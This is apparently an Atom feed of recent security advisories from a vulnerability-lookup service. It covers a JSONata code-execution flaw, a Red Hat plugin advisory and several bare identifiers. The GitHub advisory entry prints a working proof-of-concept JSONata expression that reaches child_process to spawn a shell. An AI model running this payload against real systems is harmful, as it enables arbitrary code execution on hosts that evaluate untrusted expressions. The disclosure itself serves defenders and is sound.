<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T06:31:00.659982+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-12626</id>
    <title>bdu:2026-12626</title>
    <updated>2026-10-08T06:31:01.424865+00:00</updated>
    <content>bdu:2026-12626</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-12626"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2026-avi-1165</id>
    <title>certfr-2026-avi-1165 — De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquan…</title>
    <updated>2026-10-08T06:31:01.424913+00:00</updated>
    <content>certfr-2026-avi-1165</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2026-avi-1165"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-358323</id>
    <title>EUVD-2026-358323</title>
    <updated>2026-10-08T06:31:01.424940+00:00</updated>
    <content>EUVD-2026-358323</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-358323"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-77413</id>
    <title>fkie_cve-2026-77413</title>
    <updated>2026-10-08T06:31:01.424958+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-77413"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-8gq3-vp5j-2grp</id>
    <title>GHSA-8gq3-vp5j-2grp — JSONata: Arbitrary Code Execution via crafted JSONata expressions</title>
    <updated>2026-10-08T06:31:01.424999+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: jsonata</p>
<p>## Impact</p>
<p>Before JSONata `2.2.0` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to a missing `hasOwnProperty` check in the `lookup` function:
https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705</p>
<p>This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the `2.2.0` release, and ported in the `1.8.8` release.</p>
<p>## PoC</p>
<p>```js
import jsonata from "jsonata";</p>
<p>const expression = jsonata(`
(
   __lookupSetter__('__proto__')(constructor);
   __defineGetter__('l', constructor("return
process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'}).toString()"));
   valueOf().l
)
`);</p>
<p>await expression.evaluate({});
```</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-8gq3-vp5j-2grp"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:76788</id>
    <title>RHSA-2026:76788 — Red Hat Security Advisory: Red Hat Developer Hub 1.10.5 Plugin Catalog GA plugins release.</title>
    <updated>2026-10-08T06:31:01.425050+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>undici: undici: Denial of Service via unrequested WebSocket subprotocol vm2: vm2: Denial of Service due to memory allocation limit bypass vm2: vm2: Missing Error.cause Sanitization Enables VM2 Sandbox Escape to RCE vm2: vm2: Sandbox Breakout Using Dangerous Host Proto Mutators urllib: urllib: Credential leakage via cross-origin redirects fast-uri: fast-uri: Server-Side Request Forgery via repeated hostname percent-decoding fast-uri: fast-uri: Host confusion via skipped IDN canonicalization fast-uri: fast-uri: Server-side request forgery via malformed IPv6 normalization fast-uri: fast-uri: URI parsing flaw enables server-side request forgery and redirects multer: Multer: Denial of Service via file descriptor leak on aborted uploads multer: Multer: Denial of Service via crafted multipart field names jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions jsonata: JSONata: Arbitrary Code Execution via crafted JSONata expressions multer: Multer: Denial of Service via oversized array index in field names qs: qs: Denial of Service via improper validation in stringify function fast-uri: fast-uri: Authority Injection via Unvalidated Port Serialization js-yaml: js-yaml: Denial of Service vulnerability in YAML parsing fast-uri: fast-uri: Host confusion via unbalanced URI brackets can bypass security policies undici: undici: TLS certificate validation bypass in BalancedPool via dropped connect…</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:76788"/>
  </entry>
</feed>
